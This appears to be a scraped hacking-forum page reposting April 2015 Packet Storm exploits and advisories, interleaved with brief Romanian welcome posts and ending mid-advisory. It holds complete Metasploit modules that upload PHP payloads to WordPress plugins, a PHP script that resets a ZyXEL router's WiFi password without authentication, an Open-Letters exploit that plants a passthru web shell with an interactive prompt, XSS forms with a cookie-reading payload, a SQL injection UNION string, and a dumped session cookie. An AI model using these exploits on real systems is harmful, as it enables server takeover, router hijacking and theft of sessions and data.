KhiZaRix

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote code execution. This module has been tested successfully on WordPress WPshop eCommerce 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server. }, 'Author' => [ 'g0blin', # Vulnerability Discovery, initial msf module 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module Pull Request ], 'License' => MSF_LICENSE, 'References' => [ ['WPVDB', '7830'], ['URL', 'https://research.g0blin.co.uk/g0blin-00036/'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['WPshop eCommerce 1.3.9.5', {}]], 'DisclosureDate' => 'Mar 09 2015', 'DefaultTarget' => 0) ) end def check check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3') end def exploit php_page_name = rand_text_alpha(5 + rand(5)) + '.php' data = Rex::MIME::Message.new data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"') data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"") post_data = data.to_s res = send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /#{php_page_name}/ print_good("#{peer} - Payload uploaded as #{php_page_name}") register_files_for_cleanup(php_page_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, "#{peer} - Server did not answer") end print_status("#{peer} - Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) }, 5 ) end end Source: http://packetstorm.wowhacker.com/1504-exploits/wp_wpshop_ecommerce_file_upload.rb.txt

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress InBoundio Marketing PHP Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary file upload in the WordPress InBoundio Marketing version 2.0. It allows to upload arbitrary php files and get remote code execution. This module has been tested successfully on WordPress InBoundio Marketing 2.0.3 with Wordpress 4.1.3 on Ubuntu 14.04 Server. }, 'Author' => [ 'KedAns-Dz', # Vulnerability discovery 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['EDB', '36478'], ['OSVDB', '119890'], ['WPVDB', '7864'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['InBoundio Marketing 2.0', {}]], 'DisclosureDate' => 'Mar 24 2015', 'DefaultTarget' => 0) ) end def check check_plugin_version_from_readme('inboundio-marketing') end def exploit php_page_name = rand_text_alpha(8 + rand(8)) + '.php' data = Rex::MIME::Message.new data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{php_page_name}\"") post_data = data.to_s res = send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'csv_uploader.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body.include?(php_page_name) print_good("#{peer} - Our payload is at: #{php_page_name}.") register_files_for_cleanup(php_page_name) else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'Server did not answer') end print_status("#{peer} - Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_page_name) }, 5 ) end end Source: http://packetstorm.wowhacker.com/1504-exploits/wp_inboundio_marketing_file_upload.rb.txt

<?php /* Exploit Title : ZYXEL remote configuration editor / Web Server DoS Date : 23 April 2015 Exploit Author : Koorosh Ghorbani Site : http://8thbit.net/ Vendor Homepage : http://www.zyxel.com/ Platform : Hardware Tested On : ZyXEL P-660HN-T1H_IPv6 Firmware Version: 1.02(VLU.0) -------------------------- Unattended remote access -------------------------- ZYXEL Embedded Software does not check Cookies And Credentials on POST method so attackers could changes settings and view pages with post method . -------------------------- DoS Web Server -------------------------- sending empty Post to admin pages will crash internal web server and router needs to hard reset . */ $banner = " ___ _______ _ ____ _ _______ \r\n" . " / _ \__ __| | | _ \(_)__ __|\r\n" ." | (_) | | | | |__ | |_) |_ | | \r\n" ." > _ < | | | '_ \| _ <| | | | \r\n" ." | (_) | | | | | | | |_) | | | | \r\n" ." \___/ |_| |_| |_|____/|_| |_| \r\n" ." \r\n" ." \r\n"; print $banner; function Post($packet,$host) { try { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $host); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $packet); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"); curl_setopt($curl, CURLOPT_REFERER, "Referer: http://192.168.1.1/cgi-bin/WLAN_General.asp"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($curl); curl_close($curl); return $result; }catch (Exception $e ){ echo $e->getMessage(); return "" ; } } if(sizeof($argv) < 3) { print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n"; exit(1); } $host = $argv[1]; $password = urlencode($argv[2]); $packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ; $target = "http://$host/cgi-bin/WLAN_General.asp"; if(strlen(Post($packet,$target)) > 0){ print "Seems Changed !"; }else{ print "Humm , No Chance !"; } //DoS : Post("",$target) ; ?> Source: http://packetstorm.wowhacker.com/1504-exploits/zyxel-dos.txt

MIMEDefang Email Scanner 2.78 Changes: Fixed bug in logic that coalesces multiparts to single-parts if possible; the bug broke DKIM signing. Fix is courtesy of Peter Nagel. Download: Download: MIMEDefang Email Scanner 2.78 ? Packet Storm

Bun venit , toate se înva?? încet ?i cu, calm. Po?i începe cu C++ / PHP / Java Poftim ceva care sper s? te ajute Learn | Codecademy .

Advisory ID: HTB23253 Product: FreePBX Vendor: Sangoma Technologies Vulnerable Version(s): 12.0.43 and probably prior Tested Version: 12.0.43 Advisory Publication: March 18, 2015 [without technical details] Vendor Notification: March 18, 2015 Vendor Patch: March 27, 2015 Public Disclosure: April 22, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2015-2690 Risk Level: Low CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in FreePBX, which can be exploited to perform Cross-Site Scripting (XSS) attacks against web application administrators. This vulnerability can be used to steal administratorâs cookies, perform phishing and drive-by-download attacks. 1) Multiple XSS vulnerabilities in FreePBX: CVE-2015-2690 Input passed via multiple HTTP POST parameters to "/admin/config.php" script (when "type" is set to "setup", "display" is set to "digiumaddons", "page" is set to "add-license-form", and "addon" is set to "ffa") is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. The vulnerable HTTP POST parameters are: "add_license_key", "add_license_first_name", "add_license_last_name", "add_license_company", "add_license_address1", "add_license_address2", "add_license_city", "add_license_state", "add_license_post_code", "add_license_country", "add_license_phone", and "add_license_email". The exploitation example below will show JS pop-up displaying "ImmuniWeb": <form action="http://[host]/admin/config.php?type=setup&display=digiumaddons&page=add-license-form&addon=ffa" method="post" name="main"> <input type="hidden" name="add_license_key" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_first_name" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_last_name" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_company" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_address1" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_address2" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_city" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_state" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_post_code" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_country" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_phone" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_email" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_submit" value='Submit'> <input type="submit" id="btn"> </form> <script>document.main.submit()</script> ----------------------------------------------------------------------------------------------- Solution: Update Digium Addons Module of FreePBX installation to version 2.11.0.7 More Information: http://git.freepbx.org/projects/FREEPBX/repos/digiumaddoninstaller/commits/2aad006024b74c9ff53943d3e68527a3dffac855 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23253 - https://www.htbridge.com/advisory/HTB23253 - Reflected Cross-Site Scripting (XSS) in FreePBX. [2] FreePBX - http://www.freepbx.org - FreePBX is as an open source, web-based PBX solution. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVEÂŽ is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWebÂŽ SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source: http://packetstorm.wowhacker.com/1504-exploits/freepbx-xss.txt

<?php /* OutPut: #[+] Author: TUNISIAN CYBER #[+] Script coded BY: Egidio Romano aka EgiX #[+] Title: Open-Letters Remote PHP Code Injection Vulnerability #[+] Date: 19-04-2015 #[+] Vendor: http://www.open-letters.de/ #[+] Type: WebAPP #[+] Tested on: KaliLinux (Debian) #[+] CVE: #[+] Twitter: @TCYB3R #[+] Egix's Contact: n0b0d13s[at]gmail[dot]com #[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png OL-shell> */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die( "\n[-] No response from {$host}:80\n"); fwrite($sock, $packet); return stream_get_contents($sock); } print "#[+] Author: TUNISIAN CYBER\n"; print "#[+] Script coded BY: Egidio Romano aka EgiX\n"; print "#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability\n"; print "#[+] Date: 19-04-2015\n"; print "#[+] Vendor: http://www.open-letters.de/\n"; print "#[+] Type: WebAPP\n"; print "#[+] Tested on: KaliLinux (Debian)\n"; print "#[+] CVE:\n"; print "#[+] Twitter: @TCYB3R\n"; print "#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com\n"; print "#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /zenphoto/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $exploit = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>"; $packet = "POST {$path}external_scripts/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($exploit)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$exploit}"; http_send($host, $packet); $packet = "GET {$path}external_scripts/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nOL-shell> "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?> Source: http://packetstorm.wowhacker.com/1504-exploits/openletters-inject.txt

Title: Stored XSS Vulnerability in Add Link to Facebook Wordpress Plugin Author: Rohit Kumar Plugin Homepage: http://wordpress.org/extend/plugins/add-link-to-facebook/ Severity: Medium Version Affected: Version 1.215 and mostly prior to it. Version Tested: Version 1.215 Version Patched : 1.215 Description: Vulnerable Parameter 1. App ID 2. App Secret 3. Custom Picture URL 4. Default Picture URL 5. URL News Feed Icon About Vulnerability This plugin is vulnerable to Stored Cross Site Scripting Vulnerability. This issue was exploited when user accessed to Add Link to Facebook Settings in Wordpress with Administrator privileges. A malicious administrator can hijack other users sessions, take control of another administrators browser or install malware on their computer. Vulnerability Class: Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) Steps to Reproduce: After installing the plugin: Goto Settings All in One Facebook Input this payload in App ID :- ><script>alert(1)</script> Click on the Save button. After reloading the page you will see a Pop Up Box with 1 written on it. Reload the page again to make sure its stored. Change Log https://wordpress.org/plugins/add-link-to-facebook/changelog/ Disclosure 09th March 2015 Source: http://packetstorm.wowhacker.com/1504-advisories/wpfacebook-xss.txt

Aproape toate au udp.pl , dar oricum faine

Salut ?i bine ai venit Andrei, sper s? legi prietenii cu cine trebuie ?i eventual experien?ele s? fie unele pl?cute.

Bine ai venit.

======================================================================= title: SQL Injection product: WordPress Tune Library Plugin vulnerable version: 1.5.4 (and probably below) fixed version: 1.5.5 CVE number: CVE-2015-3314 impact: CVSS Base Score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) homepage: https://wordpress.org/plugins/tune-library/ found: 2015-01-09 by: Hannes Trunde mail: hannes.trunde@gmail.com twitter: @hannestrunde ======================================================================= Plugin description: ------------------- "This plugin is used to import an XML iTunes Music Library file into your WordPress database. Once imported, you can display a complete listing of your music collection on a page of your WordPress site." Source: [url]https://wordpress.org/plugins/tune-library/[/url] Recommendation: --------------- The author has provided a fixed plugin version which should be installed immediately. Vulnerability overview/description: ----------------------------------- Because of insufficient input validation, a sql injection attack can be performed when sorting artists by letter. However, special conditions must be met in order to exploit this vulnerability: 1) The wordpress security feature wp_magic_quotes(), which is enabled by default, has to be disabled. 2) The plugin specific option "Filter artists by letter and show alphabetical navigation" has to be enabled. Proof of concept: ----------------- The following HTTP request to the Tune Library page returns version, current user and db name: =============================================================================== [url]http://www.site.com/?page_id=2&artistletter=G[/url]' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20 =============================================================================== Contact timeline: ------------------------ 2015-04-08: Contacting author via mail. 2015-04-09: Author replies and announces a fix within a week. 2015-04-12: Mail from author, stating that plugin has been updated. 2015-04-14: Requesting CVE via post to the open source software security mailing list: [url]http://openwall.com/lists/oss-security/2015/04/14/5[/url] 2015-04-20: Release of security advisory. Solution: --------- Update to the most recent plugin version. Workaround: ----------- Make sure that wp_magic_quotes() is enabled and/or disable "Filter artists by letter..." option. Source: http://packetstorm.wowhacker.com/1504-exploits/wptunelibrary154-sql.txt

Document Title: =============== Ebay Inc Xcom #6 - Persistent POST Inject Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1227 Release Date: ============= 2015-03-24 Vulnerability Laboratory ID (VL-ID): ==================================== 1227 Common Vulnerability Scoring System: ==================================== 3.9 Product & Service Introduction: =============================== eBay Inc. is an American multinational internet consumer-to-consumer corporation, headquartered in San Jose, California. It was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble; it is now a multi-billion dollar business with operations localized in over thirty countries. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. In addition to its auction-style sellings, the website has since expanded to include `Buy It Now` standard shopping; shopping by UPC, ISBN, or other kind of SKU (via Half.com); online classified advertisements online event ticket trading online money transfers and other services. (Copy of the Homepage: http://en.wikipedia.org/wiki/EBay ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered mutliple persistent input validation web vulnerabilities in the official Ebay Magento Web-Application (CMS & API). Vulnerability Disclosure Timeline: ================================== 2014-03-16: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2014-03-17: Vendor Notification (eBay Inc - Security Research Team) 2014-04-16: Vendor Response/Feedback (eBay Inc - Security Research Team) 2015-03-19: Vendor Fix/Patch (eBay Inc - Xcom Developer Team) 2015-03-24: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ebay Inc. Product: Ebay Inc - Official WebSite Application & API Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Two persistent input validation web vulnerabilities has been discovered in the official Ebay Magento Web-Application (CMS & API). A persistent vulnerability allows remote attackers to inject malicious script codes on the application-side of the affected web-application. The vulnerability is located in the real `name change` (`Namens?¤nderung`) formular. The input validation of the vulnerable `first- & lastname` does not encode scipt codes. Remote attackers are able to jungle over the main website to the real name change module. In the real name change module the change the registration name with an payload. The scipt code executes in both scenarios but only in case without doublequotes it will be changed (written) in the database. The execution occurs directly in the formular and in the top user name context location. The attack vector is persistent and the request method to inject is POST. After the save of the payload it is possible to attack platform users with the manipulated profile values. The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9. Exploitation of the persistent web vulnerability requires a low privileged web-application user account and low user interaction. Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent manipulation of affected or connected module context. Vulnerable Module(s): [+] Startseite > Namens?¤nderung > [Namens?¤nderung] Vulnerable Parameter(s): [+] firstname [+] lastname Affected Domain(s): [+] ebay.com [+] namechange.ebay.* Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided steps and information below to continue. PoC: firstname <td><input name="firstname" style="width:500px;" value="" type="text">[PERSISTENT INJECTED SCRIPT CODE!]<img src="x" onerror="prompt(23);">????? "><img src="x" onerror="prompt(23);">">?????</td> PoC: lastname <td class="Bullets"> <input name="lastname" style="width:500px;" value="" type="text">[PERSISTENT INJECTED SCRIPT CODE!]<img src="x" onerror="prompt(23);">????? "><img src="x" onerror="prompt(23);">">?????</td> PoC: Payload(s) ">%20<img src="a" onerror="prompt(23);"> "<img src="x" onerror="prompt(document.cookie);"> --- PoC Session Logs [POST] --- Status: Aus dem Cache geladen[Aus dem Cache geladen] POST http://namechange.ebay.de/ Load Flags[LOAD_FROM_CACHE ] Gr???e des Inhalts[-1] Mime Type[unbekannt] Request Header: Host[namechange.ebay.de] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://namechange.ebay.de/] Cookie[ebay=%5Ea2p%3D53271e2790000000000.%5Epsi%3DAsoSnBFk*%5EsfLMD%3D1391608831%5Esbf%3D1048576%5Ecos%3D0%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D53271766%5E; dp1=bpcid/223570455084ab5^a1p/0532868b5^bl/DE56e97e35^pbf/%2340000000000081a8c200000455084ab5^mpc/0%7C7753344635^kms/in56e97e35^reg/%5EflagReg%3D1%5E5c8d8e00^tzo/-3c53272545^exc/0%3A0%3A2%3A2534ea435^u1p/MjAxNC5rdW56bQ**55084ab5^u1f/Benjamin55084ab5^idm/1532865eb^; cssg=d0a729021440a62067e10281ff8b9953; s=BAQAAAUSucEmyAAWAAAEAClMoaGoyMDE0Lmt1bnptAAMAAVMoaLUwAWUAAlMoaLUjMgAGAAFTKGi1MACoAAFTKGi0MQFKABlTKGi1NTMyNzE3MzUuNzcuMS4xMS43OC4yLjAuMgAMAApTKGi1MTIyNTYzNzkwNgDuAGxTKGi1MQZodHRwOi8vbXkuZWJheS5kZS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JmN1cnJlbnRwYWdlPU15ZUJheUFkZHJlc3NlcyZzc3BhZ2VuYW1lPVNUUkslM0FNRSUzQUxOTEsHABEAD1MnG5owMDEyMTIwMTQua3Vuem0AEgAKUyhotXRlc3RDb29raWUA9AAiUyhotSQyJEFHbGR1QlhiJERkenZyQms4VzNCY25OdWo0WlpYZTAA+AAgUyhotWQwYTcyOTAyMTQ0MGE2MjA2N2UxMDI4MWZmOGI5OTUzALgADFMnGGExMzk1MDcwNzU2OjAAPQAKUyhotTIwMTQua3Vuem1FmLE+27m8Zof+2xnXOm4/NFcHGw**; nonsession=BAQAAAUSucEmyAAaAAEAAClUISrUyMDE0Lmt1bnptAWQAA1UISrUjOGEABAAKVQhKajIwMTQua3Vuem0AygAgXI0YtWM3OGNiZWY5MTQ0MGEzNTgyZGMzZDMxM2ZmYTdhM2IyAMsAAlMnHj05MgFMABlVCEq1NTMyNzE3MzUuNzcuMS4xMS43OC4zLjAuMgFNABlVCEq1NTMyNzE3MzUuNzcuMS4yLjEzNi4wLjAuMgAQAApVCEq1MjAxNC5rdW56bQAzAAlVCEq1MzQxMjgsREVVAPMAIlUISrUkMiRBR2xkdUJYYiREZHp2ckJrOFczQmNuTnVqNFpaWGUwALQAAVMn7vAwAJoAC1MpueoyMDE0Lmt1bnptbgCcADhVCEq1blkrc0haMlByQm1kajZ3Vm5ZK3NFWjJQckEyZGo2QUdrb2VuQzVlTG9RcWRqNng5blkrc2VRPT0AnQAIVQhKtTAwMDAwMDAxPfZj5+XMryhDSD8OFMa8uTDhh84*; cid=fQWajzwBNP9yfsZ3%232235704; lucky9=9735524; npii=btguid/c78cbef91440a3582dc3d313ffa7a3b255084a4a^cguid/c77cfce61440a56b23d61f96fe2e024155084a4a^; ds1=ats/0; ns1=BAQAAAUSucEmyAAaAANgAYlUISrVjOTR8NjAxXjEzOTUwNzAyNzMwMTdeTWpBeE5DNXJkVzU2YlE9PV4xXjN8Mnw2NXw1MHw1fDR8MTF8N14xXjJeNF4zXjEyXjEyXjJeMV4xXjBeMV4wXjBeMjE0NzQ5MTc3OQClAA1VCEq1MTIyNTYzNzkwNi8wO0yWn93iOeekHlbGoiabaz+eh5SQ; secses=BAQAAAUSucEmyAAaAAUsAGVUISrU1MzI3MTczNS43Ny4xLjExLjc4LjIuMC4y0niei+BIO3Yw57q3p8I3L/TNtoI*; shs=BAQAAAUSucEmyAAaAAVUADlMwUbQ1MTYyMjA1MzEwMDQsM9g7wvvmFa4cmHqHt8ygpU/NRi+3; ds2=asotr/b1Brzzzzzzzz^; dnc-ebay-de=e466b3644255378e63e0f112f81ebb0abf2ad87aad2a1286866a8d066286e5fc; ebay_dnc=u8sqslc4u5voc8605b5o7a8ag3; ssg=uld/1395070822457%5E] POST-Daten: firstname[+%22%3E%3C[MALICIOUS SCRIPT CODE!]%2823%29%3B%3E] lastname[+%22%3E%3C[MALICIOUS SCRIPT CODE!]%2823%29%3B%3E] reason_code[NCP] request_comment[+%22%3E%3C[MALICIOUS SCRIPT CODE!]%2823%29%3B%3E+++bug+bounty+program+test+-+bkm] action[proceed] Reference(s): https://scgi.ebay.de/ws/eBayISAPI.dll?ChangeRegistrationPreview https://scgi.ebay.de/ws/eBayISAPI.dll?ChangeRegistrationShow (Click Change original Registration Account "Name") https://signin.ebay.de/ws/eBayISAPI.dll?SignIn&runame=namechange1 (Login as the regular user account) https://signin.ebay.de/ws/eBayISAPI.dll?SignIn&runame=namechange2 (Exchange the user values with the name with a persistent script code payload) http://namechange.ebay.de/ (persistent execution with save in the frontend & executable script code in backend too!) Solution - Fix & Patch: ======================= The vulnerability needs to be patched in 3 different steps. 1. The input field of the original registration user name change module needs to be restricted on special characters or script codes 2. In the second step the input of the context itself needs to be encoded or secure parsed to prevent further execution of malicious injected script codes as original user name value. 3. The optional third step is to encode already injected strings as original names in the database to prevent executions after the module has been successful updated. Security Risk: ============== The security risk of the application-side input validation web vulnerability in the ebay original name change module is estimated as medium. Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright Š 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â? -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source: http://packetstorm.wowhacker.com/1504-exploits/VL-1227.txt

Document Title: =============== Ebay Inc Xcom #7 - (Policy) Persistent Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1228 Release Date: ============= 2015-03-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1228 Common Vulnerability Scoring System: ==================================== 4 Product & Service Introduction: =============================== eBay Inc. is an American multinational internet consumer-to-consumer corporation, headquartered in San Jose, California. It was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble; it is now a multi-billion dollar business with operations localized in over thirty countries. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. In addition to its auction-style sellings, the website has since expanded to include `Buy It Now` standard shopping; shopping by UPC, ISBN, or other kind of SKU (via Half.com); online classified advertisements online event ticket trading online money transfers and other services. (Copy of the Homepage: http://en.wikipedia.org/wiki/EBay ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered mutliple persistent input validation web vulnerabilities in the official Ebay Xcom Policy Web-Application (CMS & API). Vulnerability Disclosure Timeline: ================================== 2014-03-16: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2014-03-17: Vendor Notification (eBay Inc - Security Research Team) 2014-04-16: Vendor Response/Feedback (eBay Inc - Security Research Team) 2015-03-19: Vendor Fix/Patch (eBay Inc - Xcom Developer Team) 2015-03-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ebay Inc. Product: Ebay Inc - Official WebSite Magento Application & API 2014 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple application-side input validation web vulnerabilities has been discovered in the official Ebay Xcom Policy Web-Application (CMS & API). A persistent validation web vulnerability allows remote attackers to inject malicious script codes to the application-side of the affected ebay online-service. The vulnerability is located in the `my ebay account > return policy > edit returm policy module. The vulnerable input is the return policy name value. The persistent script code execution occurs in the affected vulnerable sections of the connected 